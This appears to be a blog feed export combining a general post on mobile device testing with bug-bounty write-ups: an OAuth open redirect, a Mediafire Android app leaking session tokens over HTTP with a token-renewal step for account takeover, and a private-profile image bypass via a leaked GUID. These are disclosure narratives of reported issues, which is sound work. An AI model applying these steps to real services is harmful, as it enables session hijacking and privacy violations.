tag:blogger.com,1999:blog-53020935237891443152024-03-05T10:24:45.420+05:30COMPUTER KORNERAnonymoushttp://www.blogger.com/profile/17646278198850847672noreply@blogger.comBlogger237125tag:blogger.com,1999:blog-5302093523789144315.post-89446661632910778412021-08-31T19:54:00.001+05:302021-08-31T20:05:38.354+05:30Best Practices For Mobile Device Testing<center><span id="docs-internal-guid-f1d42da3-7fff-edae-7d0e-cd37774781c2"><span style="color: white;"><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 401px; overflow: hidden; width: 602px;"><img height="401" src="https://lh3.googleusercontent.com/eLQG4pjfsORH88dNeHpnI__1fAWcf7F-pzoSOWyPwq6VehkVPB33Q3fk1GnsZCdZ1U6H6zjKpLhpJVmPBCdVoPrdlFI2roriKBiGRUtYJJBotsytoB2FezUVP2Tx12d-fe5RNwYN=s0" style="margin-left: 0px; margin-top: 0px;" width="602" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Photo by </span><a href="https://unsplash.com/@freestocks?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText" style="text-decoration-line: none;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">freestocks</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> on </span><a href="https://unsplash.com/s/photos/mobile-device-testing?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText" style="text-decoration-line: none;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">Unsplash</span></a></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Mobile testing</span><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> is done to confirm that all of its features, including its hardware and other software components, are functioning effectively. Technically speaking, it is called the mobile device quality check, which ensures that the software and hardware comply with the actual customer's needs. In testing, we test out all the hardware and software components.</span></p><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Types of Mobile Device Testing</span></h2><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Testing of mobile devices varies from business to business. However, these are the kinds of tests usually involved in </span><a href="https://www.perfecto.io/blog/mobile-testing" style="text-decoration-line: none;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">device testing</span></a><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.</span></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Unit Testing</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">There are a couple of components a mobile device has, such as the display, charging port, vibration motor, both front and back camera. In </span><a href="https://en.wikipedia.org/wiki/Unit_testing" style="text-decoration-line: none;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">unit testing</span></a><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">, every component of the mobile device gets separately tested. If a faulty component is installed in the mobile phone, it becomes very costly to get the phone back to the production line to change a single component. Thus, each component gets tested separately before getting installed in the device. This includes testing whether the display is working correctly and whether the camera is behaving correctly.</span></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Factory Testing</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">After the components get installed in the mobile device, the device gets tested again to find out whether all the components are working properly or not. This is done because there might be some defect in the components that get introduced during the manufacturing or assembling of the hardware. So there are various ways by which these devices get tested.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Some types are related to factory testing:</span></p><br /><ol style="margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Hardware testing</span><span style="font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: In this testing, various components of the hardware get tested, like the power button, display of the mobile phone, camera, sim card slot, etc. If there are any defects, the device is sent back to production to change those components.</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Signal receiving testing</span><span style="font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: Signal receiving tests are performed to check whether all the network access points, such as the 3G, 4G, and Wi-Fi, are working properly and are receiving good amounts of signal. This is the most important component of a mobile phone. If the phone is not able to receive any signal, calling the internet and other components will not work. It also tests to check how much signal is being received by the mobile phone.</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Battery charging testing</span><span style="font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: This testing is performed to verify whether the phone battery is charging correctly or if there is a defect in the charging capability.</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Reliability testing</span><span style="font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: Devices get tested against extreme heat and are thrown on the floor to find out how reliable they are. This is done as users might use them in extreme weather conditions or accidentally drop their phones. Therefore, it is necessary to test out the reliability of the mobile phone.</span></p></li></ol><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: justify;"><span style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Certification Testing</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This type of testing determines whether the device is suitable to launch in the market and doesn't adversely affect people's health. Devices that are potential health hazards cannot be launched because they could injure people, expose the company to lawsuits, ruin the company's image, and cost a lot to recall. Therefore, it is crucial to ensure that comprehensive certification testing is done.</span></p><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Functional Testing Performed on Devices</span></h2><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><a href="https://www.guru99.com/functional-testing.html" style="text-decoration-line: none;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">Functional testing</span></a><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> is </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">software testing that is carried out keeping in mind the functional requirements of the product. Given below are two types of functional testing.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 197px; overflow: hidden; width: 602px;"><img height="197" src="https://lh4.googleusercontent.com/Xa-DT1S5p9qW39U7TtlJid2bEJy4xjlKeHsi3CicZC9BggKxBqmRtO5CiTig7Gq1bu4UpgNpZvKrLXefKj08OE5W4iyzqI0vF7FXe0CYeTRZPrwTRk8GXA5CCuCdOLufoYIoDRw3=s0" style="margin-left: 0px; margin-top: 0px;" width="602" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://geteasyqa.com/qa/usability-testing/" style="text-align: left; text-decoration-line: none;"><span style="font-family: Arial; font-size: 10pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">Source</span></a></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: justify;"><span style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Usability Testing</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The ease of using a device is determined through usability testing. The device gets tested from the user's perspective. The camera is used to take selfies, landscape images, and other photos that a user is likely to click so that the camera quality can be tested. Other things like the call quality, the quality of the speaker and microphone, are also tested from a user's perspective. This is done so that the user doesn't have any problem using the device.</span></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: justify;"><span style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Static Code Analysis</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Static code analysis is done when the mobile manufacturers have themselves developed part of the operating system. Nowadays, almost every mobile device uses Android OS, such as </span><a href="https://en.miui.com/" style="text-decoration-line: none;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">MIUI</span></a><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">, </span><a href="https://www.oneplus.in/oxygenos" style="text-decoration-line: none;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">Oxygen OS</span></a><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">, etc. They actually modify some of the open source code to integrate some of their specific features, such as AI camera and other components. These apps need to be tested to ensure that they are properly integrated and functioning. Sometimes, the software may have some defects, which can cause problems like all the images getting blurred when taken with that feature.</span></p><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Conclusion</span></h2><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">There are a lot of different testing approaches that are followed by companies apart from functional testing. They do have their own testing methods, which they use to perform various types of tests. These tests are performed to test out the quality of the software being installed in the phone and the hardware being used to make the phone. This is done so that the end-user doesn't have any problem, as these errors are directly connected to the company's reputation. A bad device results in a user deciding not to buy another device from the same company. Thus these tests are very necessary for the growth of the company.</span></p></span></span><form action="https://www.paypal.com/cgi-bin/webscr" method="post"><span style="color: white;"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /></span> </form>
</center>Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-91106346201867836482018-08-02T12:02:00.000+05:302018-09-20T12:20:48.107+05:30Open Redirection in Oauth<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Hi there,</b><br />
<b><br /></b>
<b><br /></b>
<b>I am fond of testing API. Whenever a bug bounty program launches their program first of all I look if they have an API or not. I have tested API of many websites like Mapbox ,Mediafire and found many issues.</b><br />
<b><br /></b>
<b><br /></b>
<b>Now I stumbled across a website I don't want to disclose the name of the website so lets call it example.com. Now in example.com you can create an application and can get data from the users. They have different scope like email, phone number, address etc.</b><br />
<b><br /></b>
<b>Now they are using Oauth for all this. I created an application and started testing the same.</b><br />
<b>As soon as i created the application client_id and client secret was provided to me (intended).</b><br />
<b><br /></b>
<b>Now application only allows https url as the redirect_uri. I white-listed an url and I was ready to go.</b><br />
<b><br /></b>
<b>I have given the scope of email and tried the Oauth url they provided. Now what is actually going if you provide the wrong scope you will be redirected to the url given in the redirect_uri</b><br />
<b><br /></b>
<b>Now according to RFC 6749</b><br />
<b><br /></b>
<br />
<pre class="newpage" style="break-before: page; font-size: 13.3333px;">If the request fails due to a missing, invalid, or mismatching
redirection URI, or if the client identifier is missing or invalid,
the authorization server SHOULD inform the resource owner of the
error and MUST NOT automatically redirect the user-agent to the
invalid redirection URI</pre>
<pre class="newpage" style="break-before: page; font-size: 13.3333px;"></pre>
<pre class="newpage" style="break-before: page; font-size: 13.3333px;">If the resource owner denies the access request or if the request
fails for reasons other than a missing or invalid redirection URI,
the authorization server informs the client by adding the following
parameters to the query component of the redirection URI using the
"application/x-www-form-urlencoded" format</pre>
<pre class="newpage" style="break-before: page; font-size: 13.3333px;"></pre>
<pre class="newpage" style="break-before: page; font-size: 13.3333px;"></pre>
<pre class="newpage" style="break-before: page; font-size: 13.3333px;"></pre>
<pre class="newpage" style="break-before: page; font-size: 13.3333px;"></pre>
<pre class="newpage" style="break-before: page; font-size: 13.3333px;"></pre>
<pre class="newpage" style="break-before: page; font-size: 13.3333px;"></pre>
<b>lets take a scenario</b><br />
<b>There is a website example.com and someone created an application with a white-listed url attacker.com </b><br />
<b><br /></b>
<b>Now I</b><b>n the second paragraph of RFC6749 many dev misinterpret the word other than.</b><br />
<b>If the scope parameter is invalid then they directly redirect the user to that website without any interaction and thats how it works as on open redirect.</b><br />
<b><br /></b>
<b>Now this can be used for phishing purposes or redirecting users to a malicious website</b><br />
<b><br /></b>
<b>Now they say that this is how the Oauth works but actually if the scope is invalid then google and Facebook doesn't redirect their user to the website mentioned in redirect_uri facebook shows this type of error if the scope is invalid </b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK7DQ8qG0aMBOBKG5dCPPNuMeKDGMUtPS7UAEEsToocH08x56bZpETthZLfRixnperHF8f0rvhWSSRsnjhy8Wg__INSe4sml95gI5Nauzt56-SfvWXq2la8Qplo5Z-zPgcICw9dCJlG-0/s1600/not+redirected.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="695" data-original-width="1360" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK7DQ8qG0aMBOBKG5dCPPNuMeKDGMUtPS7UAEEsToocH08x56bZpETthZLfRixnperHF8f0rvhWSSRsnjhy8Wg__INSe4sml95gI5Nauzt56-SfvWXq2la8Qplo5Z-zPgcICw9dCJlG-0/s320/not+redirected.png" width="320" /></a></div>
<b>Now after all this I reported this bug to example.com and they denied this by saying that this is how Oauth works. And after a long trail of comment they said </b><b>we are going to operate our API according to RFC6749. thats it.</b><br />
<b><br /></b>
<b>So everything is upto them if they want to make changes to protect their users of not.</b><br />
<b><br /></b>
<b>Credits </b><br />
<b>http://blog.intothesymmetry.com/2015/04/open-redirect-in-rfc6749-aka-oauth-20.html</b><br />
<b><br /></b>
And the mitigations that were provided by John Bradley<span style="background-color: white; color: #292929; font-family: "lora" , serif; font-size: 20px;">, </span>Hannes Tschofenig you can found them here https://tools.ietf.org/id/draft-bradley-oauth-open-redirector-01.txt<br />
<br />
<br />
<b><br /></b>
<b>Thanks </b><br />
<b>Jitendra Kumar Singh(Team Computerkorner)</b><br />
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!</b><br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-45840617836657712382018-07-30T15:59:00.000+05:302018-09-20T12:19:39.817+05:30Insufficient Transport Layer Protection: Mediafire Android Application<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b>Hi there,</b><br />
<b><br /></b>
<b>It was a quite long time since I published my last post sorry for keep you waiting.</b><br />
<b><br /></b>
<b>So this is a story of a bug which I found in Mediafire android application actually </b><br />
<b>First of all I want to clarify that I never use rooted devices since it removes the most important security(access to /data/data folder) feature.</b><br />
<b><br /></b>
<b>Now lets stick to the bug.</b><br />
<b><br /></b>
<b>So after testing their API and WebApplication( I found about 10+ issues there) . Now its time to take a look at their android application.</b><br />
<b>So I installed their application directly from play store and configured Burp listen all the traffic coming from my device. Now lets start testing.</b><br />
<b><br /></b>
<b>I was playing with the android application from past 3-4 hours but I was not able to find any issue. Actually they are using API there which I already tested.</b><br />
<b>Now I started looking for some issue like every request that goes with session token should have to be https. Suddenly I noticed a request and it disappeared in secs from http history tab of burp.</b><br />
<b>Now I started digging as that request doesn't have the HTTPS protection.</b><br />
<b>Now after looking for sometime I figured out that whenever you preview any image within the android app this request goes out.</b><br />
<b><br /></b>
<span style="background-color: #f8f8f8; color: #333333; font-family: "consolas" , "liberation mono" , "courier" , monospace;">http://ww7.mediafire.com/conversion_server.php?fc02&quickkey=<quick_Key_of_file>&doc_type=i&size_id=5&session_token=<session_token_here></span><b></b><br />
<span style="background-color: #f8f8f8; color: #333333; font-family: "consolas" , "liberation mono" , "courier" , monospace;"><br /></span>
<span style="background-color: #f8f8f8; color: #333333; font-family: "consolas" , "liberation mono" , "courier" , monospace;"><br /></span>
<br />
<br />
<b>Now this request is not going on HTTPS and this request has the session token as well.</b><br />
<b><br /></b>
<br />
<h3 style="text-align: left;">
<span style="font-size: small;">How to Exploit:-</span></h3>
<div>
<b>Now if the victim is using a public wifi( malicious user's wifi) that malicious user can intercept the request and can takeover his account with the session. Now there is a catch as well the session token is only valid for 10 minutes and if you try to send a request after a idle time of 10 minutes you have to enter the password to re-authenticate yourself after that a new session token will be generated.</b></div>
<div>
<b>But there is an endpoint where you can renew the session token but you have to send the request before the 10 minutes idle time.</b></div>
<div>
<b><br /></b></div>
<div>
<span style="background-color: #f8f8f8; color: #333333; font-family: "consolas" , "liberation mono" , "courier" , monospace;">https://www.mediafire.com/api/1.5/user/renew_session_token.php?session_token=<TOKEN_YOU_GOT></span></div>
<div>
<span style="background-color: #f8f8f8; color: #333333; font-family: "consolas" , "liberation mono" , "courier" , monospace;"><br /></span></div>
<div>
<br /></div>
<b>Now you have everything you can takeover the user session without getting session timeout.</b><br />
<b><br /></b>
<b>Timeline</b><br />
<b>5 April 2016 17:25:36: Bug found</b><br />
<b>5 April 2016 17:36:37: Reported to Mediafire</b><br />
<b>7 April 2016 22:57:00: More information sent about renew the session token to bypasss the password requirement.</b><br />
<b>8 April 2016 00:52:33: Report is Triaged</b><br />
<b>8 April 2016 00:53:04: Bug is fixed</b><br />
<b>8 April 2016 (I don't remember the time ): Update issue for the Android Application.</b><br />
<b><br /></b>
<b><br /></b>
<b>It was my pleasure to work with Mediafire Security team as they are very fast in fixing and issuing the update.</b><br />
<b><br /></b>
<b><br /></b>
<b>Thats all for this post let me know you opinion in comment section</b><br />
<b><br /></b>
<b>Thanks</b><br />
<b>Jitendra Kumar Singh(Team Computer Korner)</b><br />
<b><br /></b>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <span style="font-size: small;"><input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /></span> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-47770662550096569102018-03-12T22:56:00.000+05:302018-03-12T22:56:09.576+05:30Bypassing Private Profile Restrictions <div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b><br /></b>
<b>So this post is about bypassing the private profile Restrictions on a private program on HackerOne. I will not disclose the program name so lets call it example.com</b><br />
<b><br /></b>
<b><br /></b>
<b>So I got an invitation to a private program on HackerOne. I created an account on it , it was a file hosting service where you can host all your files.</b><br />
<b><br /></b>
<b>I started testing it. I created an account and started doing reconnaissance on it as well.</b><br />
<b>After creating a profile. In setting there were two options Private profile and public profile.</b><br />
<b>They create a page for a user like imgur does with subdomain. Anyone can visit there and can see some basic info about the user. But if you profile is private, no one can see your profile , your profile picture etc.</b><br />
<b><br /></b>
<b>So I started looking for some bypass for this private profile restrictions. </b><br />
<b><br /></b>
<b>1. If a user visits to a profile image url directly they will be able to download the profile picture of the user even the profile is private. But the image url looks like this https://subdomain.example.com/api/people/1768280b-8a78-463a-bdb9-f1a96835f466/profileImage</b><br />
<b>So it will be hard to predict this </b><b>1768280b-8a78-463a-bdb9-f1a96835f466 random alphanumeric to retrieve the profile picture of the user.</b><br />
<b>So it was a failed attempt.</b><br />
<b><br /></b>
<b>2 Now when you login there is a request which goes and in its response there is a id parameter which looks like this "id":"0a7561f5-dcd0-412e-bed3-f5734da4ddbd" and if you change this with the parameter in the 1 an image will be downloaded but it was not the real image of the user.</b><br />
<b><br /></b>
<b>3. So after further investigation I found that this alphanumeric value is guid of a person.</b><br />
<b>So I was testing some of the file sharing functionalities in that site.</b><br />
<b>Now I configured my burp to listen all the request and response coming from it. Whenever a person shares a file with a person who have a private account on example.com there is a parameter in the response which leaks the person guid </b><br />
<br />
<b>"profileImageUrl":"/api/people/00000000-0000-0000-0000-000000000000/profileImage","personGuid":"efef3e0b-a3b8-4fa9-b548-d23baccc96d1"</b><br />
<b><br /></b>
<b>Now you can see the value in the profileImageUrl in 000 but personGuid have an interesting value. just change the 000 value with the value in personGuid and you can download the profile picture of the user.</b><br />
<b><br /></b>
<b>They gave me their account email and told me that please download the profile pic of this account and i successfully did that</b><br />
<b><br /></b>
<b>The team took about 1 year in fixing this issue. :( </b><br />
<b><br /></b>
<b>Thats all for this post </b><br />
<b><br /></b>
<b><br /></b>
<b>Thanks</b><br />
<b>Jitendra K Singh ( Team Computer Korner)</b><br />
<b><br /></b>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-58092561460610065172017-02-27T00:13:00.002+05:302017-02-27T23:33:13.504+05:30Bug Bounty: Bypassing Account Suspension In order to get full access to account[Mediafire]<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.mediafire.com/favicon-114.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://www.mediafire.com/favicon-114.png" /></a></div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Hi there,</b><br />
<b><br /></b>
<b><br /></b>
<b>In this post I am going to discuss about a bug which I found on Mediafire.</b><br />
<b>I noticed that Mediafire have a bug bounty program.</b><br />
<b><br /></b>
<b><br /></b>
<br />
<h3 style="text-align: left;">
<b>What is Mediafire:- </b></h3>
<b></b><br />
<b>MediaFire is a file hosting, file synchronization, and cloud storage service based in Shenandoah, Texas, United States. Founded in June 2006 by Derek Labian and Tom Langridge, the company provides client software for Microsoft Windows, Mac OS X, Linux, Android, iOS, BlackBerry 10, and web browsers.MediaFire has 43 million registered users and attracted 1.3 billion unique visitors to its domain in 2012.</b><br />
<b><br /></b>
<b>There are three types on account on Mediafire </b><br />
<b>1. Basic (free) :- Which have some basic level features and a limited storage and Bandwidth.</b><br />
